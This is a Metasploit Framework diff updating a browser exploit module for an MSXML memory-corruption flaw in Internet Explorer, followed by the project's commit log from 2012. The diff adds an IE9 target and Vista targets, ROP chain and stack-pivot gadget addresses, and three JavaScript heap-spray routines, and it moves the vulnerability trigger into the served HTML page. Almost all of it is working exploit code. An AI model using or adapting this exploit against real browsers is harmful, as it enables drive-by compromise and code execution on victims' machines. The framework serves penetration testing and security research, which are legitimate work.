Updating MSXML module with more targets

Remove trailing space
Merge branch 'master' into release
2012-06-20 15:07:47 -05:00 · 2012-06-19 16:43:37 -05:00 · 2012-06-18 20:06:01 -05:00 · 2012-06-15 15:11:04 -05:00 · 2012-06-14 10:36:33 -05:00 · 2012-06-13 14:34:15 -05:00
3 changed files with 173 additions and 63 deletions
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 					This module exploits a memory corruption flaw in Internet Explorer 8 when
 				handling objects with the same ID property. At the moment this module targets
-				IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging 
+				IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging
 				as well as the heap spray method seen in the wild (Java msvcrt71.dll).
 			},
 			'License'        => MSF_LICENSE,
@@ -15,12 +15,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	autopwn_info({
 		:ua_name    => HttpClients::IE,
 		:ua_minver  => "6.0",
-		:ua_maxver  => "8.0",
+		:ua_maxver  => "9.0",
 		:javascript => true,
 		:os_name    => OperatingSystems::WINDOWS,
 		:classid    => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}",
 		:method     => "definition",
-		:rank       => NormalRanking
+		:rank       => GoodRanking
 	})

 	def initialize(info={})
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'DefaultOptions'  =>
 				{
-					'ExitFunction'         => "none",
+					'ExitFunction'         => "process",
 					'InitialAutoRunScript' => 'migrate -f'
 				},
 			'Platform'       => 'win',
@@ -67,20 +67,23 @@ class Metasploit3 < Msf::Exploit::Remote
 						'IE 6 on Windows XP SP3',
 						{
 							'Offset' => '0x100',
-							'Rop' => nil
+							'Rop' => nil,
+							'RandomHeap' => false
 						}
 					],
 					[
-						'IE 7 on Windows XP SP3',
+						'IE 7 on Windows XP SP3 / Vista SP2',
 						{
 							'Offset' => '0x100',
-							'Rop' => nil
+							'Rop' => nil,
+							'RandomHeap' => false
 						}
 					],
 					[
 						'IE 8 on Windows XP SP3',
 						{
 							'Rop' => :msvcrt,
+							'RandomHeap' => false,
 							'RopChainOffset' => '0x5f4',
 							'Offset' => '0x0',
 							'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll
@@ -90,19 +93,31 @@ class Metasploit3 < Msf::Exploit::Remote
 						'IE 8 with Java 6 on Windows XP SP3',
 						{
 							'Rop' => :jre,
+							'RandomHeap' => false,
 							'RopChainOffset' => '0x5f4',
 							'Offset' => '0x0',
 							'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
 						}
 					],
 					[
-						'IE 8 with Java 6 on Windows 7 SP1',
+						'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',
 						{
 							'Rop' => :jre,
+							'RandomHeap' => false,
 							'RopChainOffset' => '0x5f4',
 							'Offset' => '0x0',
 							'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
 						}
+					],
+					[
+						'IE 9 with Java 6 on Windows 7 SP1',
+						{
+							'Rop' => :jre,
+							'RandomHeap' => true,
+							'RopChainOffset' => 0x5FC,
+							'Offset' => '0x0',
+							'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll
+						}
 					]
 				],
 			'Privileged'     => false,
@@ -123,10 +138,14 @@ class Metasploit3 < Msf::Exploit::Remote
 			return targets[1]  #IE 6 on Windows XP SP3
 		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
 			return targets[2]  #IE 7 on Windows XP SP3
+		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
+			return targets[2]  #IE 7 on Windows Vista SP2
 		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
 			return targets[3]  #IE 8 on Windows XP SP3
-		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
-			return targets[5]  #IE 8 on Windows 7 SP1
+		elsif agent =~ /NT 6\.[01]/ and agent =~ /MSIE 8/
+			return targets[5]  #IE 8 on Windows 7 SP1/Vista SP2
+		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
+			return targets[6]  #IE 9 on Windows 7 SP1
 		else
 			return nil
 		end
@@ -160,7 +179,13 @@ class Metasploit3 < Msf::Exploit::Remote

 	def get_rop_chain(t)

-		adjust = ret(t)
+		if t['RandomHeap']
+			adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c
+			adjust << ret(t)
+		else
+			adjust = ret(t)
+		end
+
 		adjust << popret(t)
 		adjust << [ t['StackPivot'] ].pack("V")
 		adjust << ret(t) * 4 # first call to a "ret" because there is a good gadget in the stack :)
@@ -219,6 +244,120 @@ class Metasploit3 < Msf::Exploit::Remote
 		return code
 	end

+	def get_easy_spray(t, js_code, js_nops)
+
+		spray = <<-JS
+		var heap_obj = new heapLib.ie(0x20000);
+		var code = unescape("#{js_code}");
+		var nops = unescape("#{js_nops}");
+
+		while (nops.length < 0x80000) nops += nops;
+
+		var offset = nops.substring(0, #{t['Offset']});
+		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
+
+		while (shellcode.length < 0x40000) shellcode += shellcode;
+		var block = shellcode.substring(0, (0x80000-6)/2);
+
+
+		heap_obj.gc();
+		for (var z=1; z < 0x230; z++) {
+			heap_obj.alloc(block);
+		}
+
+		JS
+
+		return spray
+
+	end
+
+
+	def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
+
+		spray = <<-JS
+
+		var heap_obj = new heapLib.ie(0x20000);
+		var code = unescape("#{js_code}");
+		var nops = unescape("#{js_nops}");
+		var nops_90 = unescape("#{js_90_nops}");
+		var rop_chain = unescape("#{js_rop}");
+
+		while (nops.length < 0x80000) nops += nops;
+		while (nops_90.length < 0x80000) nops_90 += nops_90;
+
+		var offset = nops.substring(0, #{t['Offset']});
+		var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);
+		var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
+
+
+		while (shellcode.length < 0x40000) shellcode += shellcode;
+		var block = shellcode.substring(0, (0x80000-6)/2);
+
+
+		heap_obj.gc();
+		for (var z=1; z < 0x230; z++) {
+			heap_obj.alloc(block);
+		}
+
+		JS
+
+		return spray
+
+	end
+
+	# Spray published by corelanc0d3r
+	# Exploit writing tutorial part 11 : Heap Spraying Demystified
+	# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
+	def get_random_spray(t, js_rop, js_code, js_90_nops)
+
+		spray = <<-JS
+
+		function randomblock(blocksize)
+		{
+			var theblock = "";
+			for (var i = 0; i < blocksize; i++)
+			{
+				theblock += Math.floor(Math.random()*90)+10;
+			}
+			return theblock;
+		}
+
+		function tounescape(block)
+		{
+			var blocklen = block.length;
+			var unescapestr = "";
+			for (var i = 0; i < blocklen-1; i=i+4)
+			{
+				unescapestr += "%u" + block.substring(i,i+4);
+			}
+			return unescapestr;
+		}
+
+		var heap_obj = new heapLib.ie(0x10000);
+
+		var rop = unescape("#{js_rop}");
+		var code = unescape("#{js_code}");
+		var nops_90 = unescape("#{js_90_nops}");
+
+		while (nops_90.length < 0x80000) nops_90 += nops_90;
+
+		var offset_length = #{t['RopChainOffset']};
+
+		for (var i=0; i < 0x1000; i++) {
+			var padding = unescape(tounescape(randomblock(0x1000)));
+			while (padding.length < 0x1000) padding+= padding;
+			var junk_offset = padding.substring(0, offset_length - code.length);
+			var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);
+			while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
+			sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
+			heap_obj.alloc(sprayblock);
+		}
+
+		JS
+
+		return spray
+	end
+
 	def on_request_uri(cli, request)
 		agent = request.headers['User-Agent']
 		my_target = get_target(agent)
@@ -235,66 +374,28 @@ class Metasploit3 < Msf::Exploit::Remote
 		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
 		js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

-		if my_target['Rop'].nil?
-			js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"
-		else
+
+		if not my_target['Rop'].nil?
 			js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
-			js_shellcode = <<-JS_ROP
-			var rop_chain = unescape("#{js_rop}");
-			var nops_padding = nops.substring(0, #{my_target['RopChainOffset']}-code.length-offset.length);
-			var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);
-			JS_ROP
-			js_shellcode = js_shellcode.gsub(/^\t\t\t/, '')
 		end

-		js = <<-JS
-		var heap_obj = new heapLib.ie(0x20000);
-		var code = unescape("#{js_code}");
-		var nops = unescape("#{js_nops}");
-		var nops_90 = unescape("#{js_90_nops}");
-
-		while (nops.length < 0x80000) nops += nops;
-		while (nops_90.length < 0x80000) nops_90 += nops_90;
-
-		var offset = nops.substring(0, #{my_target['Offset']});
-		#{js_shellcode}
-
-		while (shellcode.length < 0x40000) shellcode += shellcode;
-		var block = shellcode.substring(0, (0x80000-6)/2);
-
-
-		heap_obj.gc();
-		for (var z=1; z < 0x230; z++) {
-			heap_obj.alloc(block);
-		}
-
-		JS
+		if my_target['RandomHeap']
+			js = get_random_spray(my_target, js_rop, js_code, js_90_nops)
+		elsif not my_target['Rop'].nil?
+			js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)
+		else
+			js = get_easy_spray(my_target, js_code, js_nops)
+		end

 		js = heaplib(js, {:noobfu => true})

-		object_id = rand_text_alpha(4)
-
-		js_trigger = <<-TRIGGER
-		var obj = document.getElementById('#{object_id}').object;
-		var src = unescape("%u0c08%u0c0c");
-		while (src.length < 0x1002) src += src;
-		src = "\\\\\\\\xxx" + src;
-		src = src.substr(0, 0x1000 - 10);
-		var pic = document.createElement("img");
-		pic.src = src;
-		pic.nameProp;
-		obj.definition(1000);
-		TRIGGER
-
-		js_trigger = heaplib(js_trigger, {:noobfu => true})
-
 		if datastore['OBFUSCATE']
 			js = ::Rex::Exploitation::JSObfu.new(js)
 			js.obfuscate
-			js_trigger =::Rex::Exploitation::JSObfu.new(js_trigger)
-			js_trigger.obfuscate
 		end

+		object_id = rand_text_alpha(4)
+
 		html = <<-EOS
 		<html>
 		<head>
@@ -305,7 +406,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		<body>
 		<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="#{object_id}"></object>
 		<script>
-		#{js_trigger}
+		var obj = document.getElementById('#{object_id}').object;
+		var src = unescape("%u0c08%u0c0c");
+		while (src.length < 0x1002) src += src;
+		src = "\\\\\\\\xxx" + src;
+		src = src.substr(0, 0x1000 - 10);
+		var pic = document.createElement("img");
+		pic.src = src;
+		pic.nameProp;
+		obj.definition(#{rand(999) + 1});
 		</script>
 		</body>
 		</html>
@@ -360,4 +469,4 @@ ChildEBP RetAddr
 020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30
 020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219

-=end
+=end
@@ -67,7 +67,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					],
 				],
 			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'May 08 2012'))
+			'DisclosureDate' => 'May 08 2012'
+		))

 		register_options(
 			[
Author	SHA1	Message	Date
Tod Beardsley	52b19952e6	Updating MSXML module with more targets	2012-06-20 15:07:47 -05:00
Tod Beardsley	cd1a3d543f	Remove trailing space	2012-06-19 16:43:37 -05:00
Tod Beardsley	d8f9bfb0d7	Merge branch 'master' into release	2012-06-18 20:06:01 -05:00
Tod Beardsley	ee66cce176	Merge branch 'master' into release	2012-06-15 15:11:04 -05:00
HD Moore	6fc5152f96	MDM update to support fusion import	2012-06-14 10:36:33 -05:00
Tod Beardsley	c585a95dba	Language on Skype enum module	2012-06-13 14:34:15 -05:00
Tod Beardsley	dfe6afc48a	Language on MS12-005	2012-06-13 14:21:56 -05:00
Tod Beardsley	ce851dcaca	Caps in title	2012-06-13 14:19:39 -05:00
Tod Beardsley	cd4cb8aceb	Fixing print message in snort module	2012-06-13 14:10:05 -05:00
Tod Beardsley	066905f2d0	Cleaning up Modbus scanner	2012-06-13 13:58:48 -05:00
Tod Beardsley	aabdfdc212	Fixing up mysql module text	2012-06-13 13:33:36 -05:00
Tod Beardsley	3bf0d47a64	Fixing CRLFs on winlog_runtime_2	2012-06-13 13:18:47 -05:00
Tod Beardsley	550dde59c5	Fixing indents on msadc module	2012-06-13 13:16:55 -05:00
Tod Beardsley	5c57870d97	Whitespace on mysql module.	2012-06-13 13:14:25 -05:00
Tod Beardsley	5ea86ef1db	Adding carrierwave to metasploit's gemcache.	2012-06-12 12:50:58 -05:00
Tod Beardsley	cef388812d	Merge branch 'master' into release	2012-06-11 19:54:15 -05:00
Joe Vennix	ec0153a83c	Rollback rails to 3.2.2 to fix asset pipeline issues.	2012-06-06 11:22:01 -05:00
Joe Vennix	c556a7e6be	Rollback activerecord to 3.2.2 to prevent asset inclusion issues.	2012-06-06 11:21:52 -05:00
Tod Beardsley	b504b23d2d	msftidy found EOL spaces on new modules	2012-06-06 10:40:56 -05:00
Tod Beardsley	524ce94ecd	Merge branch 'release' of github_r7:rapid7/metasploit-framework into release	2012-06-05 10:14:46 -05:00
HD Moore	7d07722767	Straighten out the login error path for nexpose API calls	2012-06-04 16:07:21 -05:00
Steve Tornio	be00eff5b6	Adding swtornio's OSVDB ref Watch the trailing commas, that wangs up Ruby 1.8.7 and prior. Squashed commit of the following: commit c00363993a726cd0c87fbaee769c44f680feff72 Author: Tod Beardsley <todb@metasploit.com> Date: Mon Jun 4 09:33:18 2012 -0500 Removing trailing comma commit `594cae0cab` Author: Steve Tornio <swtornio@gmail.com> Date: Mon Jun 4 09:10:36 2012 -0500 add osvdb ref	2012-06-04 16:07:21 -05:00
jvazquez-r7	00927eec85	Use of TARGETURI	2012-06-04 16:07:21 -05:00
jvazquez-r7	097dca22bd	Verbose messages cleanup	2012-06-04 16:07:20 -05:00
jvazquez-r7	3ceabbd1f2	Fix typo in the URI param	2012-06-04 16:07:20 -05:00
jvazquez-r7	8fef08275d	Added module for CVE-2012-0391	2012-06-04 16:07:20 -05:00
sinn3r	d9b8c653b7	Change how we handle the password complexity failure	2012-06-04 16:07:20 -05:00
Chris John Riley	af5bf45b31	Altered description to include information on the password complexity check Altered the default password to meet the complexity checks Note: The complexity checks (even if they fail) don't prevent the payload from running. At this point it only raises an warning and continues on. I can change this if it's more desirable however!	2012-06-04 16:07:20 -05:00
sinn3r	7a8824ab5e	Fix typo thanks to juan	2012-06-04 16:07:20 -05:00
Chris John Riley	61e208af37	Added WMIC and complexity checks	2012-06-04 16:07:20 -05:00
Chris John Riley	2080617029	Added WMIC and complexity checks	2012-06-04 16:07:20 -05:00
Christian Mehlmauer	21d76f1589	Adding FireFart's RPORT(80) cleanup This was tested by creating a resource script to load every changed module and displaying the options, like so: ```` use auxiliary/admin/2wire/xslt_password_reset show options use auxiliary/admin/http/contentkeeper_fileaccess show options ```` ...etc. This was run in both the master branch and FireFart's branch while spooling out the results of msfconsole, then diffing those results. All modules loaded successfully, and there were no changes to the option sets, so it looks like a successful fix. Thanks FireFart! Squashed commit of the following: commit 7c1eea53fe3743f59402e445cf34fab84cf5a4b7 Author: Christian Mehlmauer <FireFart@gmail.com> Date: Fri May 25 22:09:42 2012 +0200 Cleanup Opt::RPORT(80) since it is already registered by Msf::Exploit::Remote::HttpClient	2012-06-04 16:07:20 -05:00
sinn3r	2dda99c5ae	Change filename	2012-06-04 16:07:20 -05:00
sinn3r	2258139d3e	Correct name	2012-06-04 16:07:20 -05:00
sinn3r	bb5a243705	Add CVE-2011-4825 module	2012-06-04 16:07:19 -05:00
Christian Mehlmauer	06c64161f7	Adding FireFart's hashcollision DoS module Have some minor edits below, looks like it all works now though. Squashed commit of the following: commit b7befd4889f12105f36794b1caca316d1691b335 Author: Tod Beardsley <todb@metasploit.com> Date: Fri Jun 1 14:31:32 2012 -0500 Removing ord in favor of unpack. Also renaming a 'character' variable to 'c' rather than 'i' which is easy to mistake for an Integer counter variable. commit e80f6a5622df2136bc3557b2385822ba077e6469 Author: Tod Beardsley <todb@metasploit.com> Date: Fri Jun 1 14:24:41 2012 -0500 Cleaning up print msgs commit 5fd65ed54cb47834dc646fdca8f047fca4b74953 Author: Tod Beardsley <todb@metasploit.com> Date: Fri Jun 1 14:19:10 2012 -0500 Clean up hashcollision_dos description Caps, mostly. One sentence I still don't get but it's not really a show stopper. commit bec0ee43dc9078d34a328eb416970cdc446e6430 Author: Christian Mehlmauer <FireFart@gmail.com> Date: Thu May 24 19:11:32 2012 +0200 Removed RPORT, ruby 1.8 safe, no case insensitive check, error handling commit 20793f0dfd9103c4d7067a71e81212b48318d183 Author: Christian Mehlmauer <FireFart@gmail.com> Date: Tue May 22 23:11:53 2012 +0200 Hashcollision Script (again)	2012-06-04 16:07:19 -05:00
Joe Vennix	2361a529c5	Add fix for counter_cache migration to keep from throwing readonly column error.	2012-06-04 16:07:19 -05:00
Tod Beardsley	ad8f14432b	Whitespace fix for script-fu module This is really just to check the GitHub IRC bot thinger.	2012-06-04 16:07:19 -05:00
Joe Vennix	1fc8e8ff96	Add migrations for counter_cache columns to framework.	2012-06-04 16:07:19 -05:00
sinn3r	d6a8e7a5f5	Modify the description	2012-06-04 16:07:19 -05:00
jvazquez-r7	87a9fefb3e	Added module for CVE-2012-2763	2012-06-04 16:07:19 -05:00
David Maloney	42cd97e834	Bringin in new version of pcanywhere_login	2012-06-04 16:07:19 -05:00
David Maloney	e6a53c834b	trying to work around wierd git issue	2012-06-04 16:07:19 -05:00
Samuel Huckins	660c41efc6	MDM Update	2012-06-04 16:07:19 -05:00
David Maloney	ac6661fadb	Fix nil responses	2012-06-04 16:07:18 -05:00
James Lee	2ee620cee4	Whitespace, thanks msftidy.rb!	2012-06-04 16:07:18 -05:00
James Lee	e0ce84a6e9	Chdir to TMP before writing files	2012-06-04 16:07:18 -05:00
Samuel Huckins	a33c7db47e	Now only loading MetasploitDataModels when not already loaded and contained objects not in namespace [Story #30430877]	2012-06-04 16:07:18 -05:00
James Lee	bbaceffb8b	Work around a bug in rubinius	2012-06-04 16:07:18 -05:00
Joe Vennix	84af16a8b4	Updating to Rails 3.2.4. Among other fixes, this addresses the Rails security advisory from 5/31/2012: http://groups.google.com/group/rubyonrails-security/browse_thread/thread/7546a238e1962f59 http://groups.google.com/group/rubyonrails-security/browse_thread/thread/f1203e3376acec0f Thanks Joe and Trevor! Squashed commit of the following: commit `d7031cebcc` Author: Joe Vennix <Joe_Vennix@rapid7.com> Date: Thu May 31 16:57:29 2012 -0500 Update activerecord in gemcache to support rails 3.2.4. [#30507689] commit `c7369f6d66` Author: Joe Vennix <Joe_Vennix@rapid7.com> Date: Thu May 31 16:53:01 2012 -0500 Bump rails version.	2012-06-04 16:07:18 -05:00
Tod Beardsley	9a25b10059	Fixing description for citrix module	2012-06-04 16:07:18 -05:00
Tod Beardsley	080a231770	Fixing description for citrix module	2012-06-04 16:07:18 -05:00
Tod Beardsley	f5bf954bf1	Fixing description for juan's Citrix module	2012-06-04 16:07:18 -05:00
jvazquez-r7	145747b48e	Fixed name module	2012-06-04 16:07:17 -05:00
jvazquez-r7	6ca474e0d9	Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow	2012-06-04 16:07:17 -05:00
jvazquez-r7	4842be014a	Added module for Citrix Streamprocess Opcode 0x40020002 Buffer Overflow	2012-06-04 16:07:17 -05:00
jvazquez-r7	df389bcd63	description updated	2012-06-04 16:07:17 -05:00
jvazquez-r7	82aa0185da	Added module for ZDI-12-010	2012-06-04 16:07:17 -05:00
HD Moore	60bfe2ba1c	Handle cases where a user-agent was set via headers	2012-06-04 16:07:17 -05:00
HD Moore	7e7690e5fb	Handle cisco devices better with ssh logins	2012-06-04 16:07:17 -05:00
David Maloney	cb4ccd427d	Adds thelightcosine's pcanywhere module Adds PCAnywhere bruteforce capabilities Squashed commit of the following: commit 5354fd849f0c009c534d7ce18369382dd56de550 Author: David Maloney <DMaloney@rapid7.com> Date: Thu May 31 14:35:23 2012 -0500 Add explicit pack to encrypted header commit 7911dd309a94df2729c8247c3817cf5de6b99aad Author: David Maloney <DMaloney@rapid7.com> Date: Thu May 31 13:11:19 2012 -0500 adds pcanywhere_login module	2012-06-04 16:07:17 -05:00
Steve Tornio	8d460f8343	add osvdb ref	2012-06-04 16:07:17 -05:00
sinn3r	2ea6795e02	Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find.	2012-06-04 16:07:17 -05:00
Raphael Mudge	ea18387d9c	Adding rsmudge's Armitage update Squashed commit of the following: commit `60be1b2d1d` Author: Raphael Mudge <rsmudge@gmail.com> Date: Wed May 30 19:43:07 2012 -0400 Armitage 05.30.12 A small collection of bug fixes.	2012-06-04 16:07:17 -05:00
James Lee	ff556cdbe1	But not that verbose	2012-06-04 16:07:16 -05:00
James Lee	8e46799e7a	Make meterpreter test a little more verbose	2012-06-04 16:07:16 -05:00
James Lee	f6bda30545	Add cd and pwd to Post::File API Also changes working dir to /tmp (or %TMP% on Windows) when testing file stuff.	2012-06-04 16:07:16 -05:00
sinn3r	7bf6431685	Print IP/Port for each message	2012-06-04 16:07:16 -05:00
sinn3r	785407b444	If we don't get a new file, we assume the upload failed. This is possible when we actually don't have WRITE permission to the 'uploads/' directory.	2012-06-04 16:07:16 -05:00
sinn3r	6f7ab508c9	Don't really care about the return value for the last send_request_raw	2012-06-04 16:07:16 -05:00
sinn3r	0c50f9eac2	Allow the login() function to be a little more verbose for debugging purposes	2012-06-04 16:07:16 -05:00
James Lee	476cfb642d	Committing Egypt's README updates This is all documentation changes -- adds THIRD-PARTY licenses, updates readme to be more like a readme, and moves the old readme to a COPYING file. Note that while this lands pull #388, it skips the Meterpreter changes that were brought in almost certainly by accident. Squashed commit of the following: commit `7125509e8b` Author: James Lee <egypt@metasploit.com> Date: Wed May 23 13:12:45 2012 -0600 Add license info for rkelly and anemone commit `14367041c3` Author: James Lee <egypt@metasploit.com> Date: Wed May 23 12:49:14 2012 -0600 Add licenses for gemcache stuff to THIRD-PARTY commit `c22138cf24` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 17:24:14 2012 -0600 Add useful links commit `47a9df3d54` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 16:41:21 2012 -0600 Add copyright notices commit `687567dfe2` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 16:28:17 2012 -0600 Give THIRD-PARTY an md extension Should make display on Github nicer commit `e322676413` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 16:22:55 2012 -0600 Break licenses for bundled stuff into THIRD-PARTY commit `e6463c6e7f` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 14:06:01 2012 -0600 Move README to COPYING commit `8a6a6bb63f` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 12:53:31 2012 -0600 Better wording. commit `5ac46d4f68` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 12:51:58 2012 -0600 Add a little more explanitory text to Contributing. commit `54dab50d98` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 12:37:09 2012 -0600 Missed one commit `e23c80f01e` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 12:36:33 2012 -0600 Better links commit `47b944ec65` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 12:26:12 2012 -0600 Meh, GFM doesn't like my headings commit `12a7651e91` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 12:24:42 2012 -0600 Initial stab at a better README commit `e3a0d4731b` Author: James Lee <egypt@metasploit.com> Date: Mon May 14 11:59:41 2012 -0600 LLC -> Inc. commit `5b32b4245c` Author: James Lee <egypt@metasploit.com> Date: Sun May 13 17:50:04 2012 -0600 Whitespace at EOL commit `e6719f18ab` Author: James Lee <egypt@metasploit.com> Date: Sun May 13 17:48:50 2012 -0600 Only open /dev/null if we need it	2012-06-04 16:07:16 -05:00
sinn3r	7c5ede47f9	Add PHP Volunteer Management System exploit	2012-06-04 16:07:16 -05:00
Tod Beardsley	953c54aab9	Minor updates; added BID, fixed grammar Modules should not refer to themselves in the first person unless they are looking for Sarah Connor.	2012-05-30 16:17:01 -05:00
David Maloney	142a1727c9	Revert " Sets the passive flag on the JtR modules" This reverts commit `e70ccddc9a`.	2012-05-30 10:14:13 -05:00